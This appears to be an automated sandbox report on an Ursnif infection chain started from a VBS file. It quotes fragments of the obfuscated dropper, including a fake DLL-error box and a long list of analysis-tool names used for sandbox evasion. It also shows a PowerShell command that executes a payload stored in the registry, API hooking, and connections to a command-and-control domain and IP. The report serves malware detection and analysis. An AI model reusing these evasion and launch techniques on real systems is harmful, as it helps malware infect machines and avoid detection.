                      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)REM diary character casework. 6326440 Fayetteville flaxen Doolittle Ballard backpack Alcoa loyal offertory Nicaragua axe Toni End WithEAX = MsgBox("Cant start because MSVCR101.dll is missing from your computer. Try reinstalling the program to fix this problem.", vbSystemModal+vbCritical, "System Error")Gnk("DEBUG: F_MESSAGE - True")REM bow megabyte plenitude aspirate stationery. handicapper nit frozen restaurateur Tennessee Millikan hark limerick Macedon camel Brandon hereunto disquisition plasm anatomic End FunctionFunction yNzk()Gnk("DEBUG: FS_PROCESS - Start")REM emboss indigestion surly rebuttal Kaskaskia upslope lightface stimulus vintner tabernacle male shy inhibit bravado mozzarella otherwise Gnk("DEBUG: FS_PROCESSCOUNT - Start")on error resume nextDim Theodosian,AFQTheodosian=6000' elongate conjoin protactinium monocular warplane riot rubidium bebop skyward contributory metabole stepchild lenticular rich fleabane Frisian AFQ=3000Randomize' thieving Kurt sovereign Simpson, anthropomorphic rhombic Monica loan transpose larch least farmhouse mercuric, tabletop hoosegow highboy camelopard WScript.Sleep Int((Theodosian-AFQ+1)*Rnd+AFQ)yDVFproc = ((((42 + (-27.0)) + 343.0) - 276.0) + (-82.0))wSQ = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplorer.exe","sftdcc.exe","autorepgui.exe","httplog.exe","ping.exe","shutdownmon.exe","autoruns.exe","icesword.exe","pr0c3xp.exe","sniffhit.exe","autorunsc.exe","iclicker-release.exe",".exe","prince.exe","snoop.exe","autoscreenshotter.exe","idag.exe","procanalyzer.exe","spkrmon.exe","avctestsuite.exe","idag64.exe","processhacker.exe","sysanalyzer.exe","avz.exe","idaq.exe","processmemdump.exe","syser.exe","behaviordumper.exe","immunitydebugger.exe","procexp.exe","systemexplorer.exe","bindiff.exe","importrec.exe","procexp64.exe","systemexplorerservice.exe","BTPTrayIcon.exe","imul.exe","procmon.exe","sython.exe","capturebat.exe","Infoclient.exe","procmon64.exe","taskmgr.exe","cdb.exe","installrite.exe","python.exe","taslogin.exe","ipfs.exe","pythonw.exe","tcpdump.exe","clicksharelauncher.exe","iprosetmonitor.exe","qq.exe","tcpview.exe","closepopup.exe","iragent.exe","qqffo.exe","timeout.exe","commview.exe","iris.exe","qqprotect.exe","totalcmd.exe","cports.exe","joeboxcontrol.exe","qqsg.exe","trojdie.kvpcrossfire.exe","joeboxserver.exe","raptorclient.exe","txplatform.exe","dnf.exe","lamer.exe","regmon.exe","virus.exe","dsniff.exe","LogHTTP.exe","regshot.exe","vx.exe","dumpcap.exe","lordpe.exe","RepMgr64.exe","win
                      Suspicious powershell command line foundShow sources
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01207E1F push ecx; ret 34_2_01207E2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01207AB0 push ecx; ret 34_2_01207AB9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7E1000 push eax; retf 39_2_0000019D8B7E1181
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7BC6E9 push 3B000001h; retf 39_2_0000019D8B7BC6EE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'Jump to behavior

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dllJump to dropped file
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\fum.cppJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)Show sources
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Deletes itself after installationShow sources
                      Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\start[526268].vbsJump to behavior
                      Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
                      Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                      Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeKey value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDateJump to behavior
                      Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion:

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
                      Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
                      Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
                      Source: wscript.exe, 00000000.00000003.563925033.000002CC0FD13000.00000004.00000001.sdmpBinary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
                      Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
                      Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
                      Source: C:\Windows\System32\wscript.exe TID: 1932Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6781Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2433Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServerJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Benign windows process drops PE filesShow sources
                      Source: C:\Windows\System32\wscript.exeFile created: fum.cpp.0.drJump to dropped file
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.251.90.253 80Jump to behavior
                      Maps a DLL or memory area into another processShow sources
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: unknown protection: execute and read and writeJump to behavior
                      Compiles code for process injection (via .Net compiler)Show sources
